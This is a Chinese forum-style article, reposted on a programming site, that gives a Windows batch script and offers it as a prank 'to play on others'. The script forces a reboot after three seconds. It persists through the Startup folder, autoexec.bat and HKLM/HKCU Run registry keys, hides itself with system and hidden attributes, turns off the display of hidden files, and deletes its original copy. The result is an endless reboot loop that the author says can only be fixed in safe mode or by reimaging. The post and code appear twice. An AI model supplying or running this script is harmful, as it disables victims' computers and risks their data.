可以实现反复重启的批处理
程序员文章站
2022-06-23 18:34:31
我来发几个小东西`````无聊的时候大家给别人玩玩 嘿嘿 玩出事了可别找我 反复重启的批处理 顾名思义 就是...
我来发几个小东西`````无聊的时候大家给别人玩玩 嘿嘿 玩出事了可别找我
反复重启的批处理 顾名思义 就是让别人启动了再重启 一直反复....废话不多说 看底下的代码
@echo off
shutdown -r -t 3
copy %0 c:\documents" "and" "settings\all" "users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d c:\autoexec.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
reg add hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall /v checkedvalue /t reg_dword /d 00000000 /f
del %0
3秒重启 加入了启动项 开机就会3秒倒计时 嘿嘿 要想不重启了 就到安全模式下或者ghost搞定吧 我可没其他办法
反复重启的批处理 顾名思义 就是让别人启动了再重启 一直反复....废话不多说 看底下的代码
@echo off
shutdown -r -t 3
copy %0 c:\documents" "and" "settings\all" "users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d c:\autoexec.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
reg add hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall /v checkedvalue /t reg_dword /d 00000000 /f
del %0
3秒重启 加入了启动项 开机就会3秒倒计时 嘿嘿 要想不重启了 就到安全模式下或者ghost搞定吧 我可没其他办法